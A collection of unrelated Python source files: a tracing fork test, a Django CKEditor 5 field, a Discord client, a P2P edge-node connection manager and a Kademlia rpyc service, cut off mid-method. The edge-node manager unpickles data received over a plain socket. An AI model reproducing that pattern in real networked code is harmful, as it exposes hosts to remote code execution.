pid = os.fork()
if pid == 0:
child = tracer.start_span("child", child_of=span)
assert child.parent_id == span.span_id
assert child._parent is None
assert tracer.current_span() is None
child.finish()
os._exit(12)
span.finish()
_, status = os.waitpid(pid, 0)
exit_code = os.WEXITSTATUS(status)
assert exit_code == 12
|
fields.py
|
import re
from pathlib import Path
from threading import Thread
from django.conf import settings
from django.core.files.storage import FileSystemStorage
from django.db import models
from django.db.models.signals import post_delete
from .widgets import CKEditor5Widget
def delete_images(instance):
for field in instance._meta.get_fields():
if type(field).__name__ == 'CKEditor5Field':
text = getattr(instance, field.attname)
for url in re.findall('src="([^"]+)"', text):
fs = FileSystemStorage()
folder = getattr(settings, 'CKEDITOR_5_UPLOADS_FOLDER', 'django_ckeditor_5')
uploads_path = Path(settings.MEDIA_ROOT, folder, url.split('/')[-1])
if fs.exists(uploads_path):
fs.delete(uploads_path)
class CKEditor5Field(models.Field):
def __init__(self, *args, config_name='default', **kwargs):
self.config_name = config_name
super().__init__(*args, **kwargs)
def get_internal_type(self):
if hasattr(self, 'model'):
post_delete.connect(CKEditor5Field.clean_images, sender=self.model)
return "TextField"
def formfield(self, **kwargs):
return super(CKEditor5Field, self).formfield(**{
'max_length': self.max_length,
**({'widget': CKEditor5Widget(config_name=self.config_name)}),
**kwargs,
})
@staticmethod
def clean_images(sender, instance, **kwargs):
Thread(target=delete_images, args=(instance, )).start()
|
Client.py
|
import asyncio
import time
import threading
from .HTTPSCLIENT import HTTPClient, opcode
from .Log import Log
from .Guild import Guild
class Client:
def __init__(self, Log = False):
"""
The Client class to instantiate a Discord Client.
Parameters
----------
Optional: Bool Log | Default = False
Prints out extra information.
"""
self.Log = Log
self.Loop = asyncio.get_event_loop()
self.handlers = {}
self.uptime = 0
self.guilds = []
def run(self, TOKEN, SECRET):
"""
This function starts the client.
Return nothing.
Parameters
----------
Required: String Token
The Client Token you get on https://discord.com/developers/applications/{AppID}/bot
Required: String Secret
The Client Secret you get on https://discord.com/developers/applications/{AppID}/oauth2
"""
self.Token=TOKEN
self.Secret=SECRET
self.HTTPClient = HTTPClient(self)
self.GatewayThread = threading.Thread(target=self.HTTPClient.connect)
self.GatewayThread.setName("Gateway")
self.GatewayThread.start()
self.UptimeThread = threading.Thread(target=self.counttime)
self.UptimeThread.setName("Uptime")
self.UptimeThread.start()
self.Loop.run_forever()
def event(self, method):
"""
Putting
@client.event("event")
above a function will make it get called everytime that specific event happens.
Events
------
on_ready(): gets called when the client is ready to interact with discord.
on_message(): gets called when a message gets posted into a discord guild and includes a message object in the function parameters.
Example
-------
>>> @client.event("on_ready")
>>> async def my_function():
>>> print("Bot is logged in.")
"""
def registerhandler(handler):
if method in self.handlers:
self.handlers[method].append(handler)
else:
self.handlers[method] = [handler]
return handler
return registerhandler
def counttime(self):
"""
This is not meantto be used outside the package!
Use client.get_uptime() instead!
"""
while True:
self.uptime += 1
time.sleep(1)
def call_event(self, type, *args, **kwargs):
"""
This is not meantto be used outside the package!
"""
Log.Debug(self, "Calling " + type + " event.")
if type in self.handlers:
for Method in self.handlers[type]:
asyncio.run(Method(*args, **kwargs))
async def set_status(self, state, activity=""):
"""
This function is used to set the clients status and activity.
Because of the way discord works, it might take a while to update status and activity.
Parameters
----------
Required: str State:
"online" / "idle" / "dnd" / "invisible"
something else wont work and results in an error.
Currently required: str Activity:
Example: "Counting sheep... zzz"
"""
Log.Debug(self, "Setting status to {} and activity to {}...".format(state, activity))
self.HTTPClient.Send_API(opcode.Status_update(state, activity))
return
async def get_guild(self, id):
"""
This function returns a guild object.
Parameters
----------
Required: guild_id
The guild id of the desired guild
"""
guild = self.HTTPClient.get_guild(id)
return guild
async def get_channel(self, id):
"""
This function returns a channel object.
Parameters
----------
Required: guild_id
The channel id of the desired channel
"""
channel = self.HTTPClient.get_channel(id)
return channel
async def get_guilds(self) -> list[Guild]:
"""
This function will return a list with all guilds your client is in.
"""
return self.guilds
async def get_guild_count(self) -> int:
"""
This function will return an integer that represents how many guilds the bot is currently in.
"""
guilds = len(self.guilds)
return guilds
async def get_uptime(self) -> int:
"""
This function will return an integer that represents how many seconds the bot has been online.
"""
return self.uptime
|
connection_manager_4edge.py
|
import socket
import threading
import pickle
import codecs
from concurrent.futures import ThreadPoolExecutor
from .core_node_list import CoreNodeList
from .message_manager import (
MessageManager,
MSG_CORE_LIST,
MSG_PING,
MSG_ADD_AS_EDGE,
ERR_PROTOCOL_UNMATCH,
ERR_VERSION_UNMATCH,
OK_WITH_PAYLOAD,
OK_WITHOUT_PAYLOAD,
)
# 動作確認用の値。本来は30分(1800)くらいがいいのでは
PING_INTERVAL = 10
class ConnectionManager4Edge(object):
def __init__(self, host, my_port, my_core_host, my_core_port, callback):
print('Initializing ConnectionManager4Edge...')
self.host = host
self.port = my_port
self.my_core_host = my_core_host
self.my_core_port = my_core_port
self.core_node_set = CoreNodeList()
self.mm = MessageManager()
self.callback = callback
def start(self):
"""
最初の待受を開始する際に呼び出される(ClientCore向け
"""
t = threading.Thread(target=self.__wait_for_access)
t.start()
self.ping_timer = threading.Timer(PING_INTERVAL, self.__send_ping)
self.ping_timer.start()
def connect_to_core_node(self, my_pubkey=None):
"""
ユーザが指定した既知のCoreノードへの接続(ClientCore向け
params:
my_pubkey : 自分のClientCoreに登録されている公開鍵
"""
self.my_pubkey = my_pubkey
self.__connect_to_P2PNW(self.my_core_host,self.my_core_port)
def get_message_text(self, msg_type, payload = None):
"""
指定したメッセージ種別のプロトコルメッセージを作成して返却する
params:
msg_type : 作成したいメッセージの種別をMessageManagerの規定に従い指定
payload : メッセージにデータを格納したい場合に指定する
return:
msgtxt : MessageManagerのbuild_messageによって生成されたJSON形式のメッセージ
"""
msgtxt = self.mm.build(msg_type, self.port, payload)
print('generated_msg:', msgtxt)
return msgtxt
def send_msg(self, peer, msg):
"""
指定されたノードに対してメッセージを送信する
params:
peer : 接続先のIPアドレスとポート番号を格納するタプル
msg : 送信したいメッセージ(JSON形式を想定)
"""
print('Sending... ', msg)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((peer))
s.sendall(msg.encode('utf-8'))
s.close()
except:
print('Connection failed for peer : ', peer)
self.core_node_set.remove(peer)
print('Tring to connect into P2P network...')
current_core_list = self.core_node_set.get_list()
if len(current_core_list) != 0:
new_core = self.core_node_set.get_c_node_info()
self.my_core_host = new_core[0]
self.my_core_port = new_core[1]
self.connect_to_core_node(self.my_pubkey)
self.send_msg((new_core[0], new_core[1]), msg)
else:
print('No core node found in our list...')
self.ping_timer.cancel()
def connection_close(self):
"""
終了前の処理としてソケットを閉じる
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect( (self.host, self.port))
self.socket.close()
s.close()
self.ping_timer.cancel()
def __connect_to_P2PNW(self, host, port):
"""
指定したCoreノードへ接続要求メッセージを送信する
params:
host : 接続先となるCoreノードのIPアドレス
port : 接続先となるCoreノードのポート番号
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
msg = self.mm.build(MSG_ADD_AS_EDGE, self.port, self.my_pubkey)
print(msg)
s.sendall(msg.encode('utf-8'))
s.close()
def __wait_for_access(self):
"""
Serverソケットを開いて待ち受け状態に移行する
"""
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind((self.host, self.port))
self.socket.listen(0)
executor = ThreadPoolExecutor(max_workers=10)
while True:
print('Waiting for the connection ...')
soc, addr = self.socket.accept()
print('Connected by .. ', addr)
data_sum = ''
params = (soc, addr, data_sum)
executor.submit(self.__handle_message, params)
def __handle_message(self, params):
"""
受信したメッセージを確認して、内容に応じた処理を行う。クラスの外からは利用しない想定
params :
soc : 受信したsocketのコネクション
addr : 送信元のアドレス情報
data_sum : 受信したデータを連結するためのベースにする空文字
"""
soc, addr, data_sum = params
while True:
data = soc.recv(1024)
data_sum = data_sum + data.decode('utf-8')
if not data:
break
if not data_sum:
return
result, reason, cmd, peer_port, payload = self.mm.parse(data_sum)
print(result, reason, cmd, peer_port, payload)
status = (result, reason)
if status == ('error', ERR_PROTOCOL_UNMATCH):
print('Error: Protocol name is not matched')
return
elif status == ('error', ERR_VERSION_UNMATCH):
print('Error: Protocol version is not matched')
return
elif status == ('ok', OK_WITHOUT_PAYLOAD):
if cmd == MSG_PING:
pass
else:
# 接続情報以外のメッセージしかEdgeノードで処理することは想定していない
print('Edge node does not have functions for this message!')
elif status == ('ok', OK_WITH_PAYLOAD):
if cmd == MSG_CORE_LIST:
# Coreノードに依頼してCoreノードのリストを受け取る口だけはある
if self.my_core_host == addr[0] and self.my_core_port == peer_port:
new_core_set = pickle.loads(payload.encode('utf8'))
checked = False
for c in new_core_set:
if c == (addr[0], peer_port):
checked = True
if checked:
print('List from Central. Refresh the core node list...')
print('latest core node list: ', new_core_set)
self.core_node_set.overwrite(new_core_set)
else:
print('reeceived unsafe core node list... from', (addr[0], peer_port))
else:
print('reeceived unsafe core node list... from', (addr[0], peer_port))
else:
self.callback((result, reason, cmd, peer_port, payload))
else:
print('Unexpected status', status)
def __send_ping(self):
"""
生存確認メッセージの送信処理実体。中で確認処理は定期的に実行し続けられる
param:
peer : 送信確認メッセージの送り先となるノードの接続情報(IPアドレスとポート番号)
"""
peer = (self.my_core_host, self.my_core_port)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((peer))
msg = self.mm.build(MSG_PING)
s.sendall(msg.encode('utf-8'))
s.close()
except:
print('Connection failed for peer : ', peer)
self.core_node_set.remove(peer)
print('Tring to connect into P2P network...')
current_core_list = self.core_node_set.get_list()
if len(current_core_list) != 0:
new_core = self.core_node_set.get_c_node_info()
self.my_core_host = new_core[0]
self.my_core_port = new_core[1]
self.connect_to_core_node(self.my_pubkey)
else:
print('No core node found in our list...')
self.ping_timer.cancel()
self.ping_timer = threading.Timer(PING_INTERVAL, self.__send_ping)
self.ping_timer.start()
|
kademlia.py
|
from logging import debug, error
from queue import Empty, Queue
from random import randint
from threading import Semaphore, Thread
from time import sleep
from rpyc import Connection, discover, Service
from rpyc.utils.factory import DiscoveryError
from .bucket_table import BucketTable
from .contact import Contact
from .utils import connect, get_id, KContactSortedArray, IterativeManager, try_function
class KademliaService(Service):
def __init__(self, k: int, b: int, a: int, update_time: int = None):
super(KademliaService, self).__init__()
debug(f'KademliaService.exposed_init - Executing the init with the k: {k},b: {b} and a: {a}')
self.a = a
self.is_started_node = False
self.data = {}
self.data_lock = Semaphore()
self.lamport = 0
self.lamport_lock = Semaphore()
self.k = k
self.b = b
self.is_initialized = False
self.is_initialized_lock = Semaphore()
self.my_contact = None
self.table = None
self.update_time = update_time
def exposed_init(self, contact: Contact):
if self.is_initialized:
return True
self.my_contact = Contact.from_json(contact)
debug(f'KademliaService.exposed_init - Initializing with contact: {contact}.')
debug(f'KademliaService.exposed_init - Executing the init with the contact: {self.my_contact}')
self.table = BucketTable(self.k, self.b, self.my_contact.id)
self.is_initialized = True
debug(f'KademliaService.exposed_init - End initializing with contact: {contact}.')
return True
def exposed_ping(self, client: Contact, client_lamport: int) -> bool:
if not self.is_initialized:
error(f'KademliaService.exposed_ping - Instance not initialized')
return None, self.lamport
client = Contact.from_json(client)
debug(f'KademliaService.exposed_ping - Incoming connection from {client}.')
self.update_lamport(client_lamport)
self.update_contact(client)
debug(f'KademliaService.exposed_ping - End of connection from {client}.')
return self.my_contact.to_json(), self.lamport
def exposed_client_update_network(self):
if not self.is_initialized:
error(f'KademliaService.exposed_client_update_network - Instance not initialized')
service_name = KademliaService.get_name(self.__class__)
peers = discover(service_name)
for peer in peers:
tcontact = Contact(get_id(peer), *peer)
debug(f'KademliaService.exposed_client_update_network - Making ping to peer: {tcontact}')
result, _ = self.ping_to(tcontact)
if result:
debug(f'KademliaService.exposed_client_update_network - Successfull ping to peer: {tcontact}')
else:
debug(f'KademliaService.exposed_client_update_network - Unsuccessfull ping to peer: {tcontact}')
def exposed_store(self, client: Contact, client_lamport: int, key: int, value: str, store_time: int) -> bool:
debug(f'KademliaService.exposed_store - Trying to store value in key: {key} at time: {store_time}.')
if not self.is_initialized:
error(f'KademliaService.exposed_store - Instance not initialized')
return False, self.lamport
client = Contact.from_json(client)
debug(f'KademliaService.exposed_store - Incoming connection from {client}.')
self.update_lamport(client_lamport)
self.update_contact(client)
try:
debug(f'KademliaService.exposed_store - Acquire lock for data')
self.data_lock.acquire()
actual_value, actual_time = self.data[key]
except KeyError:
actual_value, actual_time = (value, store_time)
finally:
self.data_lock.release()
debug(f'KademliaService.exposed_store - Release lock for data')
self.data_lock.acquire()
self.data[key] = (value, store_time) if store_time > actual_time else (actual_value, actual_time)
self.data_lock.release()
debug(f'KademliaService.exposed_store - End of connection from {client}.')
return True, self.lamport
def exposed_find_node(self, client: Contact, client_lamport: int, id: int) -> list:
if not self.is_initialized:
error(f'KademliaService.exposed_find_node - Instance not initialized')
return None, self.lamport
client = Contact.from_json(client)
debug(f'KademliaService.exposed_find_node - Incoming connection from {client}.')
self.update_lamport(client_lamport)
self.update_contact(client)
result = []
count = 0
table_contacts = self.table.get_closest_buckets(id)
assert table_contacts is not None
for contact in table_contacts:
result.append(contact.to_json())
count += 1
if count >= self.k:
break
debug(f'KademliaService.exposed_find_node - Replaying with {result}.')
debug(f'KademliaService.exposed_find_node - End of connection from {client}.')
return result, self.lamport
def exposed_find_value(self, client: Contact, client_lamport: int, key: int) -> object:
if not self.is_initialized:
error(f'KademliaService.exposed_find_value - Instance not initialized')
return None, self.lamport
client = Contact.from_json(client)
debug(f'KademliaService.exposed_find_value - Incoming connection from {client}.')
debug(f'KademliaService.exposed_find_value - Asking for key: {key}.')
self.update_lamport(client_lamport)
self.update_contact(client)
try:
value, stored_time = self.data[key]
debug(f'KademliaService.exposed_find_value - Replaying with value: {value} and value_time: {stored_time}.')
debug(f'KademliaService.exposed_find_value - End connection from {client}.')
return (value, stored_time), self.lamport
except KeyError:
debug(f'KademliaService.exposed_find_value - Value not founded.')
debug(f'KademliaService.exposed_find_value - End connection from {client}.')
return None, self.lamport
def exposed_client_store(self, key: int, value: str, store_time: int = None) -> bool:
if not self.is_initialized:
error(f'KademliaService.exposed_client_store - Instance not initialized')
return None
debug('KademliaService.exposed_client_store - Starting the queue')
queue = Queue()
debug('KademliaService.exposed_client_store - Starting the visited nodes set')
visited = set()
debug('KademliaService.exposed_client_store - Starting the KClosestNode array')
top_contacts = KContactSortedArray(self.k, key)
debug('KademliaService.exposed_client_store - Starting the semaphore for the queue')
queue_lock = Semaphore()
debug(f'KademliaService.exposed_client_store - Insert self contact: {self.my_contact} to the queue')
queue.put(self.my_contact)
debug(f'KademliaService.exposed_client_store - Insert self contact: {self.my_contact} to the visited nodes set')
visited.add(self.my_contact)
debug(f'KademliaService.exposed_client_store - Insert self contact: {self.my_contact} to the KClosestNode array')
top_contacts.push(self.my_contact)
debug(f'KademliaService.exposed_client_store - Starting the iteration on contacts more closes to key: {key}')
for contact in self.table.get_closest_buckets(key):
debug(f'KademliaService.exposed_client_store - Insert the contact: {contact} to the queue')
queue.put(contact)
debug(f'KademliaService.exposed_client_store - Insert the contact: {contact} to the visited nodes set')
visited.add(contact)
debug(f'KademliaService.exposed_client_store - Insert the contact: {contact} to the KClosestNode array')
top_contacts.push(contact)
if queue.qsize() >= self.a:
debug('KademliaService.exposed_client_store - Initial alpha nodes completed')
break
debug('KademliaService.exposed_client_store - Starting the IterativeManager')
manager = IterativeManager(queue.qsize, self.store_lookup, args=(key, queue, top_contacts, visited, queue_lock))
manager.start()
success = False
time = self.lamport if store_time is None else store_time
debug(f'KademliaService.exposed_client_store - Time for store: {time}')
debug(f'KademliaService.exposed_client_store - Iterate the closest K nodes to find the key: {key}')
for contact in top_contacts:
debug(f'KademliaService.exposed_client_store - Storing key: {key} with value: {value} in contact: {contact}')
result, _ = self.store_to(contact, key, value, time)
if not result:
error(f'KademliaService.exposed_client_store - The stored of key: {key} with value: {value} in contact: {contact} was NOT successfuly')
success = success or result
debug(f'KademliaService.exposed_client_store - Finish method with result: {success}')
return success
def store_lookup(self, key: int, queue: Queue, top: KContactSortedArray, visited: set, queue_lock: Semaphore):
contact = None
try:
debug(f'KademliaService.store_lookup - Removing a contact from the queue')
contact = queue.get(timeout=1)
debug(f'KademliaService.store_lookup - Contact {contact} out of the queue')
except Empty:
debug(f'KademliaService.store_lookup - Empty queue')
return
debug(f'KademliaService.store_lookup - Make the find_node on the contact: {contact}')
result, new_contacts = self.find_node_to(contact, key)
if not result:
debug(f'KademliaService.store_lookup - No connection to the node: {contact} was established')
return
debug(f'KademliaService.store_lookup - Update the table with contact: {contact}')
self.update_contact(contact)
debug(f'KademliaService.store_lookup - Cloning contacts received')
new_contacts = map(Contact.from_json, new_contacts)
debug(f'KademliaService.store_lookup - Iterate by contacts')
for new_contact in new_contacts:
debug(f'KademliaService.store_lookup - Pinging to contact: {new_contact}')
if not self.ping_to(new_contact)[0]:
debug(f'KademliaService.store_lookup - The contact: {new_contact} not respond')
continue
debug(f'KademliaService.store_lookup - Update the table with contact: {new_contact}')
self.update_contact(new_contact)
debug(f'KademliaService.store_lookup - Lock the queue')
queue_lock.acquire()
if new_contact not in visited:
debug(f'KademliaService.store_lookup - The contact: {new_contact} is NOT in the queue')
debug(f'KademliaService.store_lookup - Inserting the contact: {new_contact} to the queue and KClosestNode array and marking as visited')
visited.add(new_contact)
queue_lock.release()
queue.put(new_contact)
top.push(new_contact)
else:
debug(f'KademliaService.store_lookup - The contact: {new_contact} is in the queue')
queue_lock.release()
def exposed_client_find_node(self, id: int) -> list:
if not self.is_initialized:
error(f'KademliaService.exposed_client_find_node - Instance not initialized')
return None
if id == self.my_contact.id:
debug(f'KademliaService.exposed_client_find_node - This node is the node finded.')
debug(f'KademliaService.exposed_client_find_node - The node with id was found: {id}, the node is {self.my_contact}')
return self.my_contact.to_json()
debug('KademliaService.exposed_client_find_node - Starting the queue')
queue = Queue()
debug('KademliaService.exposed_client_find_node - Starting the visited nodes set')
visited = set()
debug('KademliaService.exposed_client_find_node - Starting the KClosestNode array')
top_contacts = KContactSortedArray(self.k, id)
debug('KademliaService.exposed_client_find_node - Starting the semaphore for the queue')
queue_lock = Semaphore()
debug(f'KademliaService.exposed_client_find_node - Insert self contact: {self.my_contact} to the queue')
queue.put(self.my_contact)
debug(f'KademliaService.exposed_client_find_node - Insert self contact: {self.my_contact} to the visited nodes set')
visited.add(self.my_contact)
debug(f'KademliaService.exposed_client_find_node - Insert self contact: {self.my_contact} to the KClosestNode array')
top_contacts.push(self.my_contact)
debug(f'KademliaService.exposed_client_find_node - Starting the iteration on contacts more closes to id: {id}')
for contact in self.table.get_closest_buckets(id):
debug(f'KademliaService.exposed_client_find_node - Insert the contact: {contact} to the queue')
queue.put(contact)
debug(f'KademliaService.exposed_client_find_node - Insert the contact: {contact} to the visited nodes set')
visited.add(contact)
debug(f'KademliaService.exposed_client_find_node - Insert the contact: {contact} to the KClosestNode array')
top_contacts.push(contact)
if queue.qsize() >= self.a:
debug('KademliaService.exposed_client_find_node - Initial alpha nodes completed')
break
debug('KademliaService.exposed_client_find_node - Starting the IterativeManager')
manager = IterativeManager(queue.qsize, self.find_node_lookup, args=(id, queue, top_contacts, visited, queue_lock))
manager.start()
debug(f'KademliaService.exposed_client_find_node - Iterate the closest K nodes to find the node: {id}')
for contact in top_contacts:
if contact.id == id:
debug(f'KademliaService.exposed_client_find_node - The node with id was found: {id}, the node is {contact}')
return contact.to_json()
debug('KademliaService.exposed_client_find_node - Finish method without finded node')
return None
def find_node_lookup(self, id: int, queue: Queue, top: KContactSortedArray, visited: set, queue_lock: Semaphore):
contact = None
try:
debug(f'KademliaService.find_node_lookup - Removing a contact from the queue')
contact = queue.get(timeout=1)
debug(f'KademliaService.find_node_lookup - Contact {contact} out of the queue')
except Empty:
debug(f'KademliaService.find_node_lookup - Empty queue')
return
debug(f'KademliaService.find_node_lookup - Make the find_node on the contact: {contact}')
result, new_contacts = self.find_node_to(contact, id)
if not result:
debug(f'KademliaService.find_node_lookup - No connection to the node: {contact} was established')
return
debug(f'KademliaService.find_node_lookup - Update the table with contact: {contact}')
self.update_contact(contact)
debug(f'KademliaService.find_node_lookup - Cloning contacts received')
new_contacts = map(Contact.from_json, new_contacts)
debug(f'KademliaService.find_node_lookup - Iterate by contacts')
for new_contact in new_contacts:
if new_contact == self.my_contact:
debug(f'KademliaService.find_node_lookup - The new_contact is equal to the my_contact, continue.')
continue
debug(f'KademliaService.find_node_lookup - Pinging to contact: {new_contact}')
if not self.ping_to(new_contact)[0]:
debug(f'KademliaService.find_node_lookup - The contact: {new_contact} not respond')
continue
debug(f'KademliaService.find_node_lookup - Update the table with contact: {new_contact}')
self.update_contact(new_contact)
debug(f'KademliaService.find_node_lookup - Lock the queue')
queue_lock.acquire()
if new_contact not in visited:
debug(f'KademliaService.find_node_lookup - The contact: {new_contact} is NOT in the queue')
debug(f'KademliaService.find_node_lookup - Inserting the contact: {new_contact} to the queue and KClosestNode array and marking as visited')
visited.add(new_contact)
queue_lock.release()
queue.put(new_contact)
top.push(new_contact)
else:
debug(f'KademliaService.find_node_lookup - The contact: {new_contact} is in the queue')
queue_lock.release()
def exposed_client_find_value(self, key: int) -> object:
if not self.is_initialized:
error(f'KademliaService.exposed_client_find_value - Instance not initialized')
return None
debug('KademliaService.exposed_client_find_value - Starting the queue')
queue = Queue()
debug('KademliaService.exposed_client_find_value - Starting the visited nodes set')
visited = set()
debug('KademliaService.exposed_client_find_value - Starting the KClosestNode array')
top_contacts = KContactSortedArray(self.k, key)
debug('KademliaService.exposed_client_find_value - Starting the semaphore for the queue')
queue_lock = Semaphore()
debug(f'KademliaService.exposed_client_find_value - Insert self contact: {self.my_contact} to the queue')
queue.put(self.my_contact)
debug(f'KademliaService.exposed_client_find_value - Insert self contact: {self.my_contact} to the visited nodes set')
visited.add(self.my_contact)
debug(f'KademliaService.exposed_client_find_value - Insert self contact: {self.my_contact} to the KClosestNode array')
top_contacts.push(self.my_contact)
last_value = [None, -1]
debug('KademliaService.exposed_client_find_value - Starting the semaphore for the last value')
last_value_lock = Semaphore()
debug(f'KademliaService.exposed_client_find_value - Starting the iteration on contacts more closes to key: {key}')
for contact in self.table.get_closest_buckets(key):
debug(f'KademliaService.exposed_client_find_value - Insert the contact: {contact} to the queue')
queue.put(contact)
debug(f'KademliaService.exposed_client_find_value - Insert the contact: {contact} to the visited nodes set')
visited.add(contact)
debug(f'KademliaService.exposed_client_find_value - Insert the contact: {contact} to the KClosestNode array')
top_contacts.push(contact)
if queue.qsize() >= self.a:
debug('KademliaService.exposed_client_find_value - Initial alpha nodes completed')
break
debug('KademliaService.exposed_client_find_value - Starting the IterativeManager')
manager = IterativeManager(queue.qsize, self.find_value_lookup, args=(key, queue, top_contacts, visited, queue_lock, last_value, last_value_lock))
manager.start()
debug(f'KademliaService.exposed_client_find_value - Iterate the closest K nodes to find the key: {key}')
value, time = last_value
if value is None:
return None
for contact in top_contacts:
debug(f'KademliaService.exposed_client_find_value - Storing key: {key} with value: {value} in contact: {contact}')
result, _ = self.store_to(contact, key, value, time)
if not result:
error(f'KademliaService.exposed_client_find_value - The stored of key: {key} with value: {value} in contact: {contact} was NOT successfuly')
debug(f'KademliaService.exposed_client_store - Finish method with value result: {value}')
return value
def find_value_lookup(self, key: int, queue: Queue, top: KContactSortedArray, visited: set, queue_lock: Semaphore, last_value: list, last_value_lock: Semaphore):
contact = None
try:
debug(f'KademliaService.find_value_lookup - Removing a contact from the queue')
contact = queue.get(timeout=1)
debug(f'KademliaService.find_value_lookup - Contact {contact} out of the queue')
except Empty:
debug(f'KademliaService.find_value_lookup - Empty queue')
return
debug(f'KademliaService.find_value_lookup - Make the find_node on the contact: {contact}')
result, new_contacts = self.find_node_to(contact, key)
if not result:
debug(f'KademliaService.find_value_lookup - No connection to the node: {contact} was established')
return
debug(f'KademliaService.find_value_lookup - Make the find_value on the contact: {contact}')
result, temp = self.find_value_to(contact, key)
if not result:
debug(f'KademliaService.find_value_lookup - No connection to the node: {contact} was established')
return
debug(f'KademliaService.find_value_lookup - Cloning contacts received')
new_contacts = map(Contact.from_json, new_contacts)
if temp:
value, time = temp
debug(f'KademliaService.find_value_lookup - Acquire lock for last value')
last_value_lock.acquire()
debug(f'KademliaService.find_value_lookup - Checking for update last value. Actual Time: {time}, Last Time: {last_value[1]}')
if time > last_value[1]:
debug(f'KademliaService.find_value_lookup - Update the last value')
last_value[0], last_value[1] = value, time
debug(f'KademliaService.find_value_lookup - Release lock for last value')
last_value_lock.release()
debug(f'KademliaService.find_value_lookup - Update the table with contact: {contact}')
self.update_contact(contact)
debug(f'KademliaService.find_value_lookup - Iterate by contacts')
for new_contact in new_contacts:
debug(f'KademliaService.find_value_lookup - Pinging to contact: {new_contact}')
if not self.ping_to(new_contact)[0]:
debug(f'KademliaService.find_value_lookup - The contact: {new_contact} not respond')
continue
debug(f'KademliaService.find_value_lookup - Update the table with contact: {new_contact}')
self.update_contact(new_contact)
debug(f'KademliaService.find_value_lookup - Lock the queue')
queue_lock.acquire()
if new_contact not in visited:
debug(f'KademliaService.find_value_lookup - The contact: {new_contact} is NOT in the queue')
debug(f'KademliaService.find_value_lookup - Inserting the contact: {new_contact} to the queue and KClosestNode array and marking as visited')
visited.add(new_contact)
queue_lock.release()
queue.put(new_contact)
top.push(new_contact)
else:
debug(f'KademliaService.find_value_lookup - The contact: {new_contact} is in the queue')
queue_lock.release()
def exposed_connect_to_network(self, contact: str):
self.exposed_init(contact)
contact = Contact.from_json(contact)
while not self.is_started_node:
try:
if not self.is_initialized:
raise Exception(f'KademliaService.exposed_connect_to_network - Instance not initialized')
try:
service_name = KademliaService.get_name(self.__class__)
debug(f'KademliaService.exposed_connect_to_network - Server name in the connect_to_network: {service_name}')
nodes = discover(service_name)
debug(f'KademliaService.exposed_connect_to_network - Discovered nodes: {nodes}')
except DiscoveryError:
raise Exception(f'KademliaService.exposed_connect_to_network - No service found')
mark = False
for ip, port in nodes:
if ip == self.my_contact.ip and port == self.my_contact.port:
continue
count = 0
while count < 5:
try:
debug(f'KademliaService.exposed_connect_to_network - Establishing connection with {ip}:{port}')
conn = connect(ip, port)
debug(f'KademliaService.exposed_connect_to_network - Pinging to {ip}:{port}')
result, _ = conn.root.ping(self.my_contact.to_json(), self.lamport)
if result:
contact = Contact.from_json(result)
else:
raise Exception(f'KademliaService.exposed_connect_to_network - The contact with address {ip}:{port} is not initialized')
debug(f'KademliaService.exposed_connect_to_network - The contact {contact} responded to the ping correctly')
break
except Exception as e:
error(f'Exception: {e} when trying ping to node with ip: {ip} and port: {port}')
count += 1
if count == 5:
debug(f'KademliaService.exposed_connect_to_network - The service with address {ip}: {port} does not respond')
continue
if contact != self.my_contact:
mark = True
self.update_contact(contact)
if not mark:
raise Exception('KademliaService.exposed_connect_to_network - Not discover node different')
try:
self.exposed_client_find_node(self.my_contact.id)
except Exception as e:
raise Exception(f'KademliaService.exposed_connect_to_network - I can\'t perform the first iterative find node because: {e}')
count_of_buckets = len(self.table)
for i in range(count_of_buckets):
if not self.table.get_bucket(i):
continue
count = 0
while count < 5:
key = randint(2**i, 2**(i + 1) - 1)
try:
self.exposed_client_find_node(key)
break
except Exception as e:
error(f'KademliaService.exposed_connect_to_network - I cannot perform the iterative find node. Exception: {e}')
count += 1
if count == 5:
debug(f'KademliaService.exposed_connect_to_network - I cannot perform the iterative find node')
self.is_started_node = True
debug(f'KademliaService.exposed_connect_to_network - Finish method. Node is started')
return True
except Exception as e:
error(e)
debug('KademliaService.exposed_connect_to_network - Sleep for 5 seconds and try to connect to the network again')
sleep(0.2)
return False
def update_values(self, force=False):
if self.update_time is None and not force:
return
debug(f'KademliaService.update_values - Starting')
if self.lamport % self.update_time and not force:
debug(f'KademliaService.update_values - No time for update')
return
thread = Thread(target=self.threaded_update_values, args=(self, force))
thread.start()
def threaded_update_values(self, force):
debug(f'KademliaService.update_values - Acquire lock for data')
self.data_lock.acquire()
debug(f'KademliaService.update_values - Copying data for temporal list')
temp = []
for key in self.data:
temp.append((key, self.data[key]))
debug(f'KademliaService.update_values - Clear data')
self.data.clear()
self.data_lock.release()
debug(f'KademliaService.update_values - Release lock for data')
success = False
for i in temp:
debug(f'KademliaService.update_values - Call client store with key: {i[0]}, values: {i[1][0]} and time: {i[1][1]}')
success = success or self.exposed_client_store(i[0], i[1][0], i[1][1])
debug(f'KademliaService.update_values - Finish with result: {success}')
def update_contact(self, contact: Contact):
debug(f'KademliaService.update_contact - Updating contact: {contact}.')
if contact == self.my_contact:
return
if not self.table.update(contact):
bucket = self.table.get_bucket(contact.id)
to_remove = None
bucket.semaphore.acquire()
for stored in bucket:
if not self.ping_to(stored)[0]:
to_remove = stored
if to_remove:
bucket.remove_by_contact(to_remove)
bucket.update(contact)
bucket.semaphore.release()
debug(f'KademliaService.update_contact - Contact updated.')
def update_lamport(self, client_lamport: int = 0):
debug(f'KademliaService.update_lamport - Updating actual time with time: {client_lamport}.')
self.lamport_lock.acquire()
self.lamport = max(client_lamport, self.lamport + 1)
self.lamport_lock.release()
self.update_values()
debug(f'KademliaService.update_lamport - Time updated.')
def connect(self, contact: Contact) -> Connection:
debug(f'KademliaService.connect - Trying to connect with contact: {contact}.')
self.update_lamport()
connection = connect(contact.ip, str(contact.port), timeout=0.5)
# connection.ping()
debug(f'KademliaService.connect - Connection with contact: {contact} stablished.')
return connection
@staticmethod
def get_name(arg) -> str:
name = arg.__name__
service = 'Service'
if name.endswith(service):
return name[:-len(service)]
@try_function()
def ping_to(self, contact: Contact) -> bool:
debug(f'KademliaService.ping_to - Trying ping to contact: {contact}.')
result, peer_time = None, None
if self.my_contact == contact:
